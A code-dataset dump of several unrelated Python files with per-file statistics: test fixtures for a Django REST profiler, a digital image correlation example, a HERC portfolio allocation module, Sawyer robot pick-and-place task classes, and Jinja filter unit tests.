def api_client():
return APIClient()
@pytest.fixture
def mock_http_request():
http_request = HttpRequest()
http_request.method = "GET"
return http_request
@pytest.fixture
def mock_http_response(mock_http_request):
response = Response()
mock_http_request.line_profiler = mock.Mock()
mock_http_request.parser_context = {"view": mock.Mock()}
response.renderer_context = {"request": mock_http_request}
return response
@pytest.fixture
def mock_output_writer(monkeypatch):
mock_output_writer_ = mock.Mock()
monkeypatch.setattr("drf_viewset_profiler.middleware.output_writer.stream", mock_output_writer_)
return mock_output_writer_
@pytest.fixture
def mock_line_profiler_viewset_middleware():
return LineProfilerViewSetMiddleware()
| 24.809524
| 100
| 0.794626
| 126
| 1,042
| 6.246032
| 0.285714
| 0.111817
| 0.101652
| 0.101652
| 0.060991
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130518
| 1,042
| 41
| 101
| 25.414634
| 0.868653
| 0
| 0
| 0.172414
| 0
| 0
| 0.06334
| 0.049904
| 0
| 0
| 0
| 0
| 0
| 1
| 0.172414
| false
| 0
| 0.206897
| 0.068966
| 0.551724
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe8b3957ceddf0ec804e544f4e167363b9d84f54
| 3,553
|
py
|
Python
|
Examples/VirtualLab/virtual_experiment_f.py
|
diehlpk/muDIC
|
b5d90aa62267b4bd0b88ae0a989cf09a51990654
|
[
"MIT"
] | 70
|
2019-04-15T08:08:23.000Z
|
2022-03-23T08:24:25.000Z
|
Examples/VirtualLab/virtual_experiment_f.py
|
diehlpk/muDIC
|
b5d90aa62267b4bd0b88ae0a989cf09a51990654
|
[
"MIT"
] | 34
|
2019-05-03T18:09:43.000Z
|
2022-02-10T11:36:29.000Z
|
Examples/VirtualLab/virtual_experiment_f.py
|
diehlpk/muDIC
|
b5d90aa62267b4bd0b88ae0a989cf09a51990654
|
[
"MIT"
] | 37
|
2019-04-25T15:39:23.000Z
|
2022-03-28T21:40:24.000Z
|
# This allows for running the example when the repo has been cloned
import sys
from os.path import abspath
sys.path.extend([abspath(".")])
# Example code follows
import logging
import numpy as np
import matplotlib.pyplot as plt
import muDIC.vlab as vlab
import muDIC as dic
"""
This example case runs an experiment where a deformation gradient is used
to deform a synthetically generated speckle. The speckle is then down-sampled by a factor of four
and sensor artifacts are included.
The analysis is then performed and the resulting deformation gradient field is compared to the
one used to deform the images.
"""
# Set the amount of info printed to terminal during analysis
logging.basicConfig(format='%(name)s:%(levelname)s:%(message)s', level=logging.INFO)
show_results = False
# Define the image you want to analyse
n_imgs = 2
image_shape = (500, 500)
downsample_factor = 4
super_image_shape = tuple(dim * downsample_factor for dim in image_shape)
# Make a speckle image
speckle_image = vlab.rosta_speckle(super_image_shape, dot_size=4, density=0.5, smoothness=2.0)
# Make an image deformed
F = np.array([[1.01,0],[0.01,1.0]])
image_deformer = vlab.imageDeformer_from_defGrad(F)
# Make an image down-sampler including downscaling, fill-factor and sensor grid irregularities
downsampler = vlab.Downsampler(image_shape=super_image_shape, factor=downsample_factor, fill=.95,
pixel_offset_stddev=0.05)
# Make a noise injector producing 2% gaussian additive noise
noise_injector = vlab.noise_injector("gaussian", sigma=.02)
# Make an synthetic image generation pipeline
image_generator = vlab.SyntheticImageGenerator(speckle_image=speckle_image, image_deformer=image_deformer,
downsampler=downsampler, noise_injector=noise_injector, n=n_imgs)
# Put it into an image stack
image_stack = dic.ImageStack(image_generator)
# Now, make a mesh. Make sure to use enough elements
mesher = dic.Mesher(deg_n=3, deg_e=3,type="spline")
#mesh = mesher.mesh(image_stack) # Use this if you want to use a GUI
mesh = mesher.mesh(image_stack,Xc1=50,Xc2=450,Yc1=50,Yc2=450,n_ely=8,n_elx=8, GUI=False)
# Prepare the analysis input and initiate the analysis
input = dic.DICInput(mesh, image_stack)
input.tol = 1e-6
input.interpolation_order = 4
dic_job = dic.DICAnalysis(input)
results = dic_job.run()
# Calculate the fields for later use. Seed is used when spline elements are used and upscale is used for Q4.
fields = dic.Fields(results, seed=101,upscale=10)
# We will now compare the results from the analysis to the deformation gradient which the image was deformed by
if show_results:
plt.figure()
plt.imshow(F[0,0] - fields.F()[0, 0,0, :, :, 1], cmap=plt.cm.magma)
plt.xlabel("Element e-coordinate")
plt.ylabel("Element n-coordinate")
plt.colorbar()
plt.title("Difference in deformation gradient component 0,0 within the element")
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
#line1 = ax1.plot(res_field[:, 50], label="correct")
line2 = ax1.plot(fields.F()[0, 0,0, :, 50, 1], label="DIC")
ax1.set_xlabel("element e-coordinate")
ax1.set_ylabel("Deformation gradient component 0,0 []")
ax2 = fig1.add_subplot(111, sharex=ax1, frameon=False)
line3 = ax2.plot(F[0,0] - fields.F()[0, 0,0, :, 50, 1], "r--", label="difference")
ax2.yaxis.tick_right()
ax2.yaxis.set_label_position("right")
ax2.set_ylabel("Deviation []")
plt.title("Deformation gradient component 0,0")
fig1.legend()
plt.show()
| 36.628866
| 112
| 0.731776
| 554
| 3,553
| 4.595668
| 0.406137
| 0.009427
| 0.005892
| 0.010605
| 0.070699
| 0.016496
| 0.016496
| 0.010212
| 0
| 0
| 0
| 0.036651
| 0.162961
| 3,553
| 96
| 113
| 37.010417
| 0.819435
| 0.249648
| 0
| 0
| 0
| 0
| 0.121317
| 0.014731
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.137255
| 0
| 0.137255
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe8d5aa19fb8f623818fa75491db0f6d028311d8
| 3,203
|
py
|
Python
|
Optimisation Portfolios/HERC.py
|
BrandonAFong/Ideas
|
5d38be2dfaba12a534220e3f28a6c9da9aefcdec
|
[
"MIT"
] | null | null | null |
Optimisation Portfolios/HERC.py
|
BrandonAFong/Ideas
|
5d38be2dfaba12a534220e3f28a6c9da9aefcdec
|
[
"MIT"
] | null | null | null |
Optimisation Portfolios/HERC.py
|
BrandonAFong/Ideas
|
5d38be2dfaba12a534220e3f28a6c9da9aefcdec
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 31 22:48:21 2021
@author: apple
"""
import numpy as np
import pandas as pd
from HRP import seriation
import fastcluster
from scipy.cluster.hierarchy import fcluster
from gap_statistic import OptimalK
from backtest import df_to_matrix
#HERC
def intersection(list1, list2):
intersec = [set(list1) & set(list2)]
return intersec
def compute_allocation(covar, clusters,Z,dimensions):
numClusters = len(clusters)
aWeights = np.array([1.] * len(covar))
cWeights = np.array([1.] * numClusters)
cVar = np.array([0.] * numClusters)
for i, cluster in clusters.items():
cluster_covar = covar[cluster, :][:, cluster]
inv_diag = 1 / np.diag(cluster_covar)
aWeights[cluster] = inv_diag / np.sum(inv_diag)
for i, cluster in clusters.items():
weights = aWeights[cluster]
cVar[i - 1] = np.dot(
weights, np.dot(covar[cluster, :][:, cluster], weights))
for m in range(numClusters - 1):
left = int(Z[dimensions - 2 - m, 0])
lc = seriation(Z, dimensions, left)
right = int(Z[dimensions - 2 - m, 1])
rc = seriation(Z, dimensions, right)
id_lc = []
id_rc = []
for i, cluster in clusters.items():
if sorted(intersection(lc, cluster)) == sorted(cluster):
id_lc.append(i)
if sorted(intersection(rc, cluster)) == sorted(cluster):
id_rc.append(i)
id_lc = np.array(id_lc) - 1
id_rc = np.array(id_rc) - 1
alpha = 0
lcVar = np.sum(cVar[id_lc])
rcVar = np.sum(cVar[id_rc])
alpha = lcVar / (lcVar + rcVar)
cWeights[id_lc] = cWeights[
id_lc] * alpha
cWeights[id_rc] = cWeights[
id_rc] * (1 - alpha)
for i, cluster in clusters.items():
aWeights[cluster] = aWeights[cluster] * cWeights[
i - 1]
return aWeights
#Dataframe of returns
def HERC(mat_ret):
# Need to first calculate the optimal number of clusters
# mat_ret must be a pandas DataFrame of returns (one column per asset)
# correl_mat = mat_ret.corr(method='pearson')
column_dic = {k:v for v, k in enumerate(mat_ret.columns)}
correl_mat = df_to_matrix(mat_ret.corr(method='pearson'))
dist = 1 - correl_mat
dim = len(dist)
tri_a, tri_b = np.triu_indices(dim, k = 1)
Z = fastcluster.linkage(dist[tri_a, tri_b], method='ward')
optimalK = OptimalK(parallel_backend = 'rust')
n_clusters = optimalK(mat_ret.values, cluster_array = np.arange(1,len(mat_ret)))
nb_clusters = n_clusters
clustering_inds = fcluster(Z, nb_clusters, criterion='maxclust')
clusters = {i: [] for i in range(min(clustering_inds),max(clustering_inds) + 1)}
for i, v in enumerate(clustering_inds):
clusters[v].append(i)
HERC_w = compute_allocation(correl_mat, clusters, Z, dim)
HERC_w = pd.Series(HERC_w)
my_inverted_dict = dict(map(reversed, column_dic.items()))
HERC_w = HERC_w.rename(index = my_inverted_dict)
return HERC_w
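A hedged usage sketch for the HERC allocation above; random returns stand in for real data, and the optional dependencies imported at the top of the file (fastcluster, gap_statistic with the rust backend, the local HRP and backtest modules) must be available:
import numpy as np
import pandas as pd

rng = np.random.default_rng(0)
returns = pd.DataFrame(rng.normal(0.0, 0.01, size=(250, 4)),
                       columns=['A', 'B', 'C', 'D'])  # hypothetical daily returns
weights = HERC(returns)
print(weights)  # pandas Series of portfolio weights indexed by asset name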
| 28.345133
| 84
| 0.609429
| 435
| 3,203
| 4.34023
| 0.328736
| 0.014831
| 0.023305
| 0.027542
| 0.10911
| 0.055085
| 0
| 0
| 0
| 0
| 0
| 0.015866
| 0.271933
| 3,203
| 113
| 85
| 28.345133
| 0.793739
| 0.086794
| 0
| 0.058824
| 0
| 0
| 0.007898
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044118
| false
| 0
| 0.102941
| 0
| 0.191176
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe908006796adb02dbc2aa1b3ab9fa0ac75b1812
| 5,574
|
py
|
Python
|
sawyer/mujoco/tasks/transition_pick_and_place_task.py
|
rlagywjd802/gym-sawyer
|
385bbeafcccb61afb9099554f6a99b16f1f1a7c5
|
[
"MIT"
] | null | null | null |
sawyer/mujoco/tasks/transition_pick_and_place_task.py
|
rlagywjd802/gym-sawyer
|
385bbeafcccb61afb9099554f6a99b16f1f1a7c5
|
[
"MIT"
] | null | null | null |
sawyer/mujoco/tasks/transition_pick_and_place_task.py
|
rlagywjd802/gym-sawyer
|
385bbeafcccb61afb9099554f6a99b16f1f1a7c5
|
[
"MIT"
] | null | null | null |
import numpy as np
from sawyer.mujoco.tasks.base import ComposableTask
class TransitionTask(ComposableTask):
"""
Task to pick up an object with the robot gripper.
Success condition:
- Object is grasped and has been lifted above the table
"""
def __init__(self):
pass
def compute_reward(self, obs, info):
return 0
def is_success(self, obs, info=None, init=None):
raise NotImplementedError
def is_terminate(self, obs, init):
return self.is_success(obs, init=init)
def is_fail(self, obs):
raise NotImplementedError
def reset(self):
pass
@property
def completion_bonus(self):
return self._completion_bonus
class TransitionPickTask(TransitionTask):
"""
Task to pick up an object with the robot gripper.
Success condition:
- Object is grasped and has been lifted above the table
"""
def __init__(self,
success_thresh=0.05,
object_lift_target=0.3,
completion_bonus=0):
self._success_thresh = success_thresh
self._obj_lift_target = object_lift_target
self._completion_bonus = completion_bonus
self._t = 0
def is_success(self, obs, info=None, init=None):
        return True  # NOTE: this early return stubs success to True; the distance check below is unreachable
if init:
self.reset()
goal = obs[11:14] + np.array([0, 0, 0.04])
box_pos = obs[4:7]
d = np.linalg.norm(box_pos - goal, axis=-1)
print("****[pick/is success] box_pos:{}, goal:{}, d:{}".format(box_pos, goal, d))
return d < self._success_thresh
def is_fail(self, obs):
self._t += 1
if self._t >= 1 and not self.is_success(obs):
return True
return False
def reset(self):
self._t = 0
class TransitionPlaceTask(TransitionTask):
"""
Task to place object at a desired location.
"""
def __init__(self,
success_thresh=0.015,
completion_bonus=0):
self._success_thresh = success_thresh
self._completion_bonus = completion_bonus
self._prev_box_pos = None
def is_success(self, obs, info=None, init=None):
if init:
self.reset()
box_pos = obs[4:7]
goal = obs[11:14]
max_xy_diff = 0.03
abs_diff = abs(box_pos - goal)
print("****[place/is success] abs_diff:{}".format(abs_diff))
return ( abs_diff[0] < max_xy_diff and
abs_diff[1] < max_xy_diff and
box_pos[2] < 0.21 )
def is_fail(self, obs):
box_pos = obs[4:7]
goal = obs[11:14]
max_xy_diff = 0.03
abs_diff = abs(box_pos - goal)
if self._prev_box_pos is None:
self._prev_box_pos = box_pos
else:
max_z_diff = 0.009
z_diff = self._prev_box_pos[2] - box_pos[2]
print("****[place/is_fail] z_diff:{}, box_pos_z:{}".format(z_diff, box_pos[2]))
print(self._prev_box_pos[2], box_pos[2])
if abs_diff[0] > max_xy_diff or abs_diff[1] > max_xy_diff or z_diff < max_z_diff:
return True
else:
self._prev_box_pos = box_pos
return False
def reset(self):
self._prev_box_pos = None
class TransitionPickAndPlaceTask(TransitionTask):
"""
Task to pick up an object and place the object at a desired location.
Success condition:
- Object is grasped and has been lifted above the table
"""
def __init__(self,
success_thresh=0.01,
completion_bonus=0):
self._success_thresh = success_thresh
self._completion_bonus = completion_bonus
self._prev_box_pos = None
self._picked = False
self._placing = False
def is_success(self, obs, info=None, init=None):
if init:
self.reset()
box_pos = obs[4:7]
goal = obs[11:14]
max_xy_diff = 0.02
abs_diff = abs(box_pos - goal)
print("****[pick&place/is success] abs_diff:{}, box_z:{}".format(abs_diff, box_pos[2]))
return ( abs_diff[0] < max_xy_diff and
abs_diff[1] < max_xy_diff and
box_pos[2] < 0.22 )
def is_fail(self, obs):
box_pos = obs[4:7]
goal = obs[11:14]
abs_diff = abs(box_pos - goal)
max_xy_diff = 0.03
if self._picked:
self._placing = True
print("placing True")
else:
print("placing False")
if self._picked and not self._placing:
print("return True")
return True
self._picked = True
if self._placing:
if self._prev_box_pos is None:
self._prev_box_pos = box_pos
else:
max_z_diff = 0.009
z_diff = self._prev_box_pos[2] - box_pos[2]
print("****[pick&place/is_fail] z_diff:{}, box_pos_z:{}".format(z_diff, box_pos[2]))
print(self._prev_box_pos[2], box_pos[2])
if box_pos[2] < 0.24 and (abs_diff[0] > max_xy_diff or abs_diff[1] > max_xy_diff or z_diff < max_z_diff):
print("return True")
return True
else:
self._prev_box_pos = box_pos
return False
def get_next_primitive(self, obs, prev_primitive):
if prev_primitive == -1:
return 'pick'
return 'place'
def reset(self):
self._picked = False
self._placing = False
self._prev_box_pos = None
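# --- Editor's usage sketch (assumption, not part of the original file). ---
# Drives a TransitionPickAndPlaceTask with a hand-built observation vector.
# The 14-element layout (obs[4:7] = box position, obs[11:14] = goal position)
# mirrors how the methods above index obs; the numbers are hypothetical.
if __name__ == '__main__':
    task = TransitionPickAndPlaceTask(success_thresh=0.01)
    obs = np.zeros(14)
    obs[4:7] = [0.5, 0.0, 0.20]    # box sitting at the goal, below the 0.22 height check
    obs[11:14] = [0.5, 0.0, 0.20]  # goal position
    print(task.is_success(obs, init=True))                  # True
    print(task.get_next_primitive(obs, prev_primitive=-1))  # 'pick'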
| 28.880829
| 121
| 0.571582
| 760
| 5,574
| 3.911842
| 0.142105
| 0.084763
| 0.0518
| 0.065927
| 0.685167
| 0.612176
| 0.54995
| 0.523713
| 0.523713
| 0.506895
| 0
| 0.028877
| 0.329028
| 5,574
| 192
| 122
| 29.03125
| 0.766043
| 0.079117
| 0
| 0.669118
| 0
| 0
| 0.054884
| 0.004755
| 0
| 0
| 0
| 0
| 0
| 1
| 0.147059
| false
| 0.014706
| 0.014706
| 0.022059
| 0.308824
| 0.080882
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe90ddd8fb4cfe4289850e4b9709b973ed6310cd
| 36,485
|
py
|
Python
|
tests/app/test_jinja_filters.py
|
nealedj/eq-survey-runner
|
b8e6cddae6068f6c8fd60e21d31d58aaa79bbb34
|
[
"MIT"
] | null | null | null |
tests/app/test_jinja_filters.py
|
nealedj/eq-survey-runner
|
b8e6cddae6068f6c8fd60e21d31d58aaa79bbb34
|
[
"MIT"
] | 1
|
2018-11-05T12:00:51.000Z
|
2018-11-05T12:00:51.000Z
|
tests/app/test_jinja_filters.py
|
nealedj/eq-survey-runner
|
b8e6cddae6068f6c8fd60e21d31d58aaa79bbb34
|
[
"MIT"
] | null | null | null |
# coding: utf-8
from types import SimpleNamespace
from datetime import datetime, timedelta
from unittest.mock import patch
from dateutil.relativedelta import relativedelta
from jinja2 import Undefined, Markup
from mock import Mock
from app.jinja_filters import (
format_date, format_conditional_date, format_currency, get_currency_symbol,
format_multilined_string, format_percentage, format_date_range,
format_household_member_name, format_datetime,
format_number_to_alphabetic_letter, format_unit, format_currency_for_input,
format_number, format_unordered_list, format_unit_input_label,
format_household_member_name_possessive, concatenated_list,
calculate_years_difference, get_current_date, as_london_tz, max_value,
min_value, get_question_title, get_answer_label,
format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom,
format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list)
from tests.app.app_context_test_case import AppContextTestCase
class TestJinjaFilters(AppContextTestCase): # pylint: disable=too-many-public-methods
def setUp(self):
self.autoescape_context = Mock(autoescape=True)
super(TestJinjaFilters, self).setUp()
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_currency_for_input(self):
self.assertEqual(format_currency_for_input('100', 2), '100.00')
self.assertEqual(format_currency_for_input('100.0', 2), '100.00')
self.assertEqual(format_currency_for_input('100.00', 2), '100.00')
self.assertEqual(format_currency_for_input('1000'), '1,000')
self.assertEqual(format_currency_for_input('10000'), '10,000')
self.assertEqual(format_currency_for_input('100000000'), '100,000,000')
self.assertEqual(format_currency_for_input('100000000', 2), '100,000,000.00')
self.assertEqual(format_currency_for_input(0, 2), '0.00')
self.assertEqual(format_currency_for_input(0), '0')
self.assertEqual(format_currency_for_input(''), '')
self.assertEqual(format_currency_for_input(None), '')
self.assertEqual(format_currency_for_input(Undefined()), '')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_get_currency_symbol(self):
self.assertEqual(get_currency_symbol('GBP'), '£')
self.assertEqual(get_currency_symbol('EUR'), '€')
self.assertEqual(get_currency_symbol('USD'), 'US$')
self.assertEqual(get_currency_symbol('JPY'), 'JP¥')
self.assertEqual(get_currency_symbol(''), '')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_currency(self):
self.assertEqual(format_currency(self.autoescape_context, '11', 'GBP'), "<span class='date'>£11.00</span>")
self.assertEqual(format_currency(self.autoescape_context, '11.99', 'GBP'), "<span class='date'>£11.99</span>")
self.assertEqual(format_currency(self.autoescape_context, '11000', 'USD'), "<span class='date'>US$11,000.00</span>")
self.assertEqual(format_currency(self.autoescape_context, 0), "<span class='date'>£0.00</span>")
self.assertEqual(format_currency(self.autoescape_context, 0.00), "<span class='date'>£0.00</span>")
self.assertEqual(format_currency(self.autoescape_context, '', ), "<span class='date'></span>")
self.assertEqual(format_currency(self.autoescape_context, None), "<span class='date'></span>")
self.assertEqual(format_currency(self.autoescape_context, Undefined()), "<span class='date'></span>")
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_number(self):
self.assertEqual(format_number(123), '123')
self.assertEqual(format_number('123.4'), '123.4')
self.assertEqual(format_number('123.40'), '123.4')
self.assertEqual(format_number('1000'), '1,000')
self.assertEqual(format_number('10000'), '10,000')
self.assertEqual(format_number('100000000'), '100,000,000')
self.assertEqual(format_number(0), '0')
self.assertEqual(format_number(0.00), '0')
self.assertEqual(format_number(''), '')
self.assertEqual(format_number(None), '')
self.assertEqual(format_number(Undefined()), '')
def test_format_multilined_string_matches_carriage_return(self):
# Given
new_line = 'this is on a new\rline'
# When
format_value = format_multilined_string(self.autoescape_context, new_line)
self.assertEqual(format_value, 'this is on a new<br>line')
def test_format_multilined_string_matches_new_line(self):
# Given
new_line = 'this is on a new\nline'
# When
format_value = format_multilined_string(self.autoescape_context,
new_line)
self.assertEqual(format_value, 'this is on a new<br>line')
def test_format_multilined_string_matches_carriage_return_new_line(self):
# Given
new_line = 'this is on a new\r\nline'
# When
format_value = format_multilined_string(self.autoescape_context, new_line)
self.assertEqual(format_value, 'this is on a new<br>line')
def test_format_multilined_string(self):
# Given
new_line = 'this is\ron a\nnew\r\nline'
# When
format_value = format_multilined_string(self.autoescape_context,
new_line)
self.assertEqual(format_value, 'this is<br>on a<br>new<br>line')
def test_format_multilined_string_auto_escape(self):
# Given
new_line = '<'
# When
format_value = format_multilined_string(self.autoescape_context, new_line)
self.assertEqual(str(format_value), '<')
def test_get_current_date(self):
# Given
date_format = '%-d %B %Y'
# When
format_value = get_current_date(self.autoescape_context)
current_date = as_london_tz(datetime.utcnow()).strftime(date_format)
# Then
self.assertEqual(format_value, "<span class='date'>{date}</span>".format(date=current_date))
def test_format_date(self):
# Given
date = '2017-01-01'
# When
with self.app_request_context('/'):
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, "<span class='date'>1 January 2017</span>")
def test_format_date_month_year(self):
# Given
date = '2017-01'
# When
with self.app_request_context('/'):
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, "<span class='date'>January 2017</span>")
def test_format_date_markup(self):
# Given
date = [Markup('2017-01')]
# When
with self.app_request_context('/'):
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, "<span class='date'>January 2017</span>")
def test_format_date_non_string(self):
# Given
date = 123
# When
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, 123)
def test_format_date_none(self):
# Given
date = None
# When
format_value = format_date(self.autoescape_context, date)
# Then
self.assertIsNone(format_value)
def test_format_date_time_in_bst(self):
# Given
date_time = '2018-03-29T11:59:13.528680'
# When
with self.app_request_context('/'):
format_value = format_datetime(self.autoescape_context, date_time)
# Then
self.assertEqual(format_value, "<span class='date'>29 March 2018 at 12:59</span>")
def test_format_date_time_in_gmt(self):
# Given
date_time = '2018-10-28T11:59:13.528680'
# When
with self.app_request_context('/'):
format_value = format_datetime(self.autoescape_context, date_time)
# Then
self.assertEqual(format_value, "<span class='date'>28 October 2018 at 11:59</span>")
def test_format_conditional_date_not_date(self):
        # Given - there is no test for integers; that check was removed from jinja_filters
invalid_input = [('1', None),
('1-1-1', None)]
# When
for nonsense in invalid_input:
date1 = nonsense[0]
date2 = nonsense[1]
with self.assertRaises(Exception) as exception:
format_conditional_date(self.autoescape_context, date1, date2)
# Then
self.assertIn("does not match format '%Y-%m'", str(exception.exception))
def test_format_conditional_date_not_set(self):
# Given
# When
with self.assertRaises(Exception) as exception:
format_conditional_date(self.autoescape_context, None, None)
# Then
self.assertIn('No valid dates passed to format_conditional_dates filter', str(exception.exception))
def test_format_conditional_date(self):
# Given
datelist = [('2016-01-12', '2016-02-12', '12 January 2016'),
('2017-12-23', None, '23 December 2017'),
(None, '2017-12-24', '24 December 2017')]
# When
with self.app_request_context('/'):
for triple in datelist:
date1 = triple[0]
date2 = triple[1]
format_value = format_conditional_date(self.autoescape_context, date1, date2)
# Then
self.assertEqual(format_value, "<span class='date'>{date}</span>".format(date=triple[2]))
def test_calculate_years_difference(self):
with patch('app.setup.get_session_store', return_value=None):
# Given
ten_years_ago = (datetime.today()+relativedelta(years=-10)).strftime('%Y-%m-%d')
date_list = [('2017-01-30', '2018-01-30', '1 year'),
('2015-02-02', '2018-02-01', '2 years'),
('2016-02-29', '2017-02-28', '1 year'),
('2016-02-29', '2020-02-28', '3 years'),
(ten_years_ago, 'now', '10 years')]
for dates in date_list:
start_date = dates[0]
end_date = dates[1]
# When
calculated_value = calculate_years_difference(start_date, end_date)
# Then
self.assertEqual(calculated_value, dates[2])
def test_calculate_years_difference_none(self):
# Given
with self.assertRaises(Exception) as e:
# When
calculate_years_difference(None, '2017-01-17')
# Then
self.assertEqual('Valid date(s) not passed to calculate_years_difference filter', str(e.exception))
def test_format_date_range(self):
# Given
start_date = '2017-01-01'
end_date = '2017-01-31'
# When
with self.app_request_context('/'):
format_value = format_date_range(self.autoescape_context, start_date, end_date)
# Then
self.assertEqual(format_value, "<span class='date'>1 January 2017</span> to <span class='date'>31 January 2017</span>")
def test_format_date_range_missing_end_date(self):
# Given
start_date = '2017-01-01'
# When
with self.app_request_context('/'):
format_value = format_date_range(self.autoescape_context, start_date)
# Then
self.assertEqual(format_value, "<span class='date'>1 January 2017</span>")
def test_format_household_member_name(self):
# Given
name = ['John', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John Doe')
def test_format_household_member_name_no_surname(self):
# Given
name = ['John', '']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John')
def test_format_household_member_name_surname_is_none(self):
# Given
name = ['John', None]
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John')
def test_format_household_member_name_no_first_name(self):
# Given
name = ['', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'Doe')
def test_format_household_member_name_first_name_is_none(self):
# Given
name = [None, 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'Doe')
def test_format_household_member_name_first_middle_and_last(self):
# Given
name = ['John', 'J', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John J Doe')
def test_format_household_member_name_no_middle_name(self):
# Given
name = ['John', '', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John Doe')
def test_format_household_member_name_middle_name_is_none(self):
# Given
name = ['John', None, 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John Doe')
def test_format_household_member_name_trim_spaces(self):
# Given
name = ['John ', ' Doe ']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John Doe')
def test_format_household_member_name_possessive(self):
# Given
name = ['John', 'Doe']
# When
format_value = format_household_member_name_possessive(name)
self.assertEqual(format_value, 'John Doe\u2019s')
def test_format_household_member_name_possessive_with_no_names(self):
# Given
name = [Undefined(), Undefined()]
# When
format_value = format_household_member_name_possessive(name)
self.assertIsNone(format_value)
def test_format_household_member_name_possessive_trailing_s(self):
# Given
name = ['John', 'Does']
# When
format_value = format_household_member_name_possessive(name)
self.assertEqual(format_value, 'John Does\u2019')
def test_concatenated_list(self):
# Given
list_items = ['1 The ONS', 'Newport', 'NP108XG']
# When
format_value = concatenated_list(list_items)
self.assertEqual(format_value, '1 The ONS, Newport, NP108XG')
def test_concatenated_list_one_entry(self):
# Given
list_items = ['One entry']
# When
format_value = concatenated_list(list_items)
self.assertEqual(format_value, 'One entry')
def test_concatenated_list_trim_white_spaces_and_trailing_commas(self):
# Given
list_items = ['', '1 The ONS ', 'Newport ', ' NP108XG', '']
# When
format_value = concatenated_list(list_items)
self.assertEqual(format_value, '1 The ONS, Newport, NP108XG')
def test_format_percentage(self):
self.assertEqual(format_percentage('100'), '100%')
self.assertEqual(format_percentage(100), '100%')
self.assertEqual(format_percentage(4.5), '4.5%')
def test_format_number_to_alphabetic_letter(self):
self.assertEqual(format_number_to_alphabetic_letter(0), 'a')
self.assertEqual(format_number_to_alphabetic_letter(4), 'e')
self.assertEqual(format_number_to_alphabetic_letter(25), 'z')
self.assertEqual(format_number_to_alphabetic_letter(-1), '')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_unit(self):
self.assertEqual(format_unit('length-meter', 100), '100 m')
self.assertEqual(format_unit('length-centimeter', 100), '100 cm')
self.assertEqual(format_unit('length-mile', 100), '100 mi')
self.assertEqual(format_unit('length-kilometer', 100), '100 km')
self.assertEqual(format_unit('area-square-meter', 100), '100 m²')
self.assertEqual(format_unit('area-square-centimeter', 100), '100 cm²')
self.assertEqual(format_unit('area-square-kilometer', 100), '100 km²')
self.assertEqual(format_unit('area-square-mile', 100), '100 sq mi')
self.assertEqual(format_unit('area-hectare', 100), '100 ha')
self.assertEqual(format_unit('area-acre', 100), '100 ac')
self.assertEqual(format_unit('volume-cubic-meter', 100), '100 m³')
self.assertEqual(format_unit('volume-cubic-centimeter', 100), '100 cm³')
self.assertEqual(format_unit('volume-liter', 100), '100 l')
self.assertEqual(format_unit('volume-hectoliter', 100), '100 hl')
self.assertEqual(format_unit('volume-megaliter', 100), '100 Ml')
self.assertEqual(format_unit('duration-hour', 100), '100 hrs')
self.assertEqual(format_unit('duration-hour', 100, 'long'), '100 hours')
self.assertEqual(format_unit('duration-year', 100, 'long'), '100 years')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='cy'))
def test_format_unit_welsh(self):
self.assertEqual(format_unit('duration-hour', 100), '100 awr')
self.assertEqual(format_unit('duration-year', 100), '100 bl')
self.assertEqual(format_unit('duration-hour', 100, 'long'), '100 awr')
self.assertEqual(format_unit('duration-year', 100, 'long'), '100 mlynedd')
